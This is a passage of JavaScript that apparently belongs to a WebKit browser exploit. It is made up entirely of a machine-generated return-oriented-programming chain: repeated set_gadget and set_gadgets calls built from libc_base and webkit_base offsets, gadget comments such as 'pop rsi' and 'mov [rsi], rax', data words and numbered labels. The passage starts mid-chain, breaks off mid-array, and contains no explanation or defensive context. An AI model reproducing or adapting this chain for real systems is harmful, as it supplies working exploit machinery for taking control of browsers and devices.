libc_base+764760, //pop rsi ropchain+114680, //L1266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+114696, //L1267 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1266: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1267: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1268: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+114784, //L1270 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1270: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+114840, //L1271 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1271: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+114936, //L1274 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1273: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1274: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1275: db([26, 0]); // 0x1a set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+115032, //L1276 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+115048, //L1277 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1276: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1277: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); 
db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+115136, //L1279 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1279: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+115192, //L1280 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1280: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+115264, //L1283 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1283: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+115320, //L1284 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1284: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1286: libc_base+144605, //pop rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+115456, //L1287 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1287: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1289: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+115576, //L1292 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+115560, //L1290 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1290: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1292: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+115720, //L1295 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+115688, //L1293 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+115704, //L1294 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1293: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1294: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1295: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+115792, //L1297 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1297: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+115848, //L1298 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1298: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+115944, //L1301 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1300: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1301: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1302: db([27, 0]); // 0x1b set_gadgets([ 
webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+116040, //L1303 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+116056, //L1304 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1303: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1304: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+116144, //L1306 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1306: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+116200, //L1307 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1307: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+116272, //L1310 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1310: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+116328, //L1311 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1311: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+116416, //L1313 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 
libc_base+763368 //pop rcx ]); //L1313: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1315: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+116536, //L1318 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+116520, //L1316 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1316: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1318: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+116680, //L1321 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+116648, //L1319 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+116664, //L1320 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1319: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1320: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1321: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+116752, //L1323 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1323: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+116808, //L1324 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1324: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi 
ropchain+116904, //L1327 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1326: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1327: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1328: db([1, 0]); // 0x1 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+117000, //L1329 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+117016, //L1330 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1329: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1330: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+117104, //L1332 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1332: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+117160, //L1333 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1333: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+117264, //L1335 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1335: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1337: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi 
ropchain+117384, //L1340 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+117368, //L1338 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1338: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1340: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+117528, //L1343 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+117496, //L1341 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+117512, //L1342 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1341: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1342: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1343: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+117600, //L1345 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1345: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+117656, //L1346 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1346: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+117752, //L1349 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1348: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1349: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); 
//pop rax //L1350: db([28, 0]); // 0x1c set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+117848, //L1351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+117864, //L1352 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1351: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1352: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+117952, //L1354 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1354: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+118008, //L1355 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1355: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+118080, //L1358 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1358: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+118136, //L1359 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1359: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1361: webkit_base+12288695, //mov [rdi], r9 
libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+118272, //L1362 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1362: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1364: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+118392, //L1367 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+118376, //L1365 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1365: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1367: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+118536, //L1370 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+118504, //L1368 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+118520, //L1369 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1368: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1369: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1370: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+118608, //L1372 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1372: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+118664, //L1373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop 
rcx ]); //L1373: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+118760, //L1376 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1375: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1376: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1377: db([29, 0]); // 0x1d set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+118856, //L1378 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+118872, //L1379 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1378: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1379: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+118960, //L1381 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1381: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+119016, //L1382 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1382: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+119088, //L1385 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1385: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] 
libc_base+764760, //pop rsi ropchain+119144, //L1386 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1386: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1388: libc_base+144605, //pop rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+119280, //L1389 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1389: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1391: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+119400, //L1394 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+119384, //L1392 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1392: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1394: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+119544, //L1397 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+119512, //L1395 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+119528, //L1396 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1395: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1396: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1397: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 
0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+119616, //L1399 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1399: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+119672, //L1400 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1400: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+119768, //L1403 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1402: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1403: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1404: db([30, 0]); // 0x1e set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+119864, //L1405 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+119880, //L1406 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1405: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1406: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+119968, //L1408 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1408: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+120024, //L1409 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1409: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+120096, //L1412 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1412: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+120152, //L1413 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1413: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+120240, //L1415 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1415: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1417: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+120360, //L1420 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+120344, //L1418 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1418: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1420: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+120504, //L1423 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+120472, //L1421 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+120488, //L1422 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1421: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1422: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1423: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+120576, //L1425 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1425: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+120632, //L1426 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1426: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+120728, //L1429 webkit_base+660161, //mov 